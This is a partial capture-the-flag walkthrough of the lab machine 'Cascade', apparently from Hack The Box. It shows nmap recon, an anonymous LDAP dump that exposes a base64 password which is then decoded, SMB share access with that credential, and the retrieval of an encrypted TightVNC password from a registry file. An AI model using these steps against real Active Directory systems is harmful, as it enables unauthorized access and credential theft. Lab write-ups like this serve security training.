I start off with an nmap scan:

└─# nmap -sC -sV -A 10.10.10.182
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-06-18 15:04:34Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC

Host script results:
|_clock-skew: 1m50s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-06-18T15:05:37
|_  start_date: 2021-06-17T20:34:56

---------------------------------------------------
Ldap search:

└─# ldapsearch -x -h 10.10.10.182 -s sub -b 'DC=cascade,DC=local' > ldap
└─# cat ldap | grep -i pwd -A 5 -B 5
logonCount: 2
sAMAccountName: r.thompson
--
cascadeLegacyPwd: clk0bjVldmE=
└─# echo -n "clk0bjVldmE=" | base64 -d
rY4n5eva

└─# smbmap -u r.thompson -p rY4n5eva -H 10.10.10.182

└─# smbclient -U r.thompson //10.10.10.182/Data
Enter WORKGROUP\r.thompson's password: 
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  Contractors                         D        0  Mon Jan 13 04:45:11 2020
  Finance                             D        0  Mon Jan 13 04:45:06 2020
  IT                                  D        0  Tue Jan 28 21:04:51 2020
  Production                          D        0  Mon Jan 13 04:45:18 2020
  Temps                               D        0  Mon Jan 13 04:45:15 2020

\Contractors
NT_STATUS_ACCESS_DENIED listing \Contractors\*

\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*

\IT
  Email Archives                      D        0  Tue Jan 28 21:00:30 2020
  LogonAudit                          D        0  Tue Jan 28 21:04:40 2020
  Logs                                D        0  Wed Jan 29 03:53:04 2020
  Temp                                D        0  Wed Jan 29 01:06:59 2020

\Production
NT_STATUS_ACCESS_DENIED listing \Production\*

\Temps
NT_STATUS_ACCESS_DENIED listing \Temps\*

\IT\Email Archives
  Meeting_Notes_June_2018.html       An     2522  Tue Jan 28 21:00:12 2020

\IT\LogonAudit

\IT\Logs
  Ark AD Recycle Bin                  D        0  Fri Jan 10 19:33:45 2020
  DCs                                 D        0  Wed Jan 29 03:56:00 2020

\IT\Temp
  r.thompson                          D        0  Wed Jan 29 01:06:53 2020
  s.smith                             D        0  Tue Jan 28 23:00:01 2020

\IT\Logs\Ark AD Recycle Bin
  ArkAdRecycleBin.log                 A     1303  Wed Jan 29 04:19:11 2020

\IT\Logs\DCs
  dcdiag.log                          A     5967  Fri Jan 10 19:17:30 2020

\IT\Temp\r.thompson

\IT\Temp\s.smith
  VNC Install.reg                     A     2680  Tue Jan 28 22:27:44 2020

└─# cat VNC\ Install.reg 

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f

References :
https://blog.luckolen.xyz/posts/HTB/Cascade

